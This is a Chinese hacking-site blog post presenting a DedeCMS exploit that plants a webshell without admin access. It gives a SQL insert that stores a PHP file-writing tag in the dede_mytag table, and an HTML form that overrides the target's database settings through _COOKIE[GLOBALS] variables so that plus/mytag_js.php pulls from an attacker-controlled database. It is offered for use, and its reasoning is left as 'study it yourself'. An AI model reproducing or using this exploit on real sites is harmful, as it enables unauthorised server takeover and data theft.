黑客365

首页 » 入侵专题 » 阅读文章

dedecms最新0day利用不进后台直接拿WEBSHELL

2011-04-17 00:26 2533 0 发表评论

配合刚暴的织梦不用管理员帐号和密码就能进后台的漏洞

拿webshell的方法如下:

网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.

前题条件,必须准备好自己的dede数据库,然后插入数据:

insert into dede_mytag(aid,normbody) values(1,’{dede:php}$fp = @fopen(“1.php”, \’a\’);@fwrite($fp, \’\');echo “OK”;@fclose($fp);{/dede:php}’);

再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。

<form action=”" method=”post” name=”QuickSearch” id=”QuickSearch” onsubmit=”addaction();”>
<input type=”text” value=”http://www.tmdsb.com/plus/mytag_js.php?aid=1″ name=”doaction” style=”width:400″><br />
<input type=”text” value=”dbhost” name=”_COOKIE[GLOBALS][cfg_dbhost]” style=”width:400″><br />
<input type=”text” value=”dbuser” name=”_COOKIE[GLOBALS][cfg_dbuser]” style=”width:400″><br />
<input type=”text” value=”dbpwd” name=”_COOKIE[GLOBALS][cfg_dbpwd]” style=”width:400″><br />
<input type=”text” value=”dbname” name=”_COOKIE[GLOBALS][cfg_dbname]” style=”width:400″><br />
<input type=”text” value=”dede_” name=”_COOKIE[GLOBALS][cfg_dbprefix]” style=”width:400″><br />
<input type=”text” value=”true” name=”nocache” style=”width:400″>
<input type=”submit” value=”提交” name=”QuickSearchBtn”><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>


收藏此文



评论 共0条 (RSS 2.0) 发表评论

  1. 暂无评论,快抢沙发吧。

发表评论

  • 使用新浪微博登陆
  • 
    疑问 冷笑 悲伤 坏蛋 感叹 微笑 脸红 大笑 吃惊 惊讶 困惑 酷 大声笑 恼火 古怪 转眼睛 给眼色 好主意 箭头 一般 哭了 绿人
  • want to say:

回到页首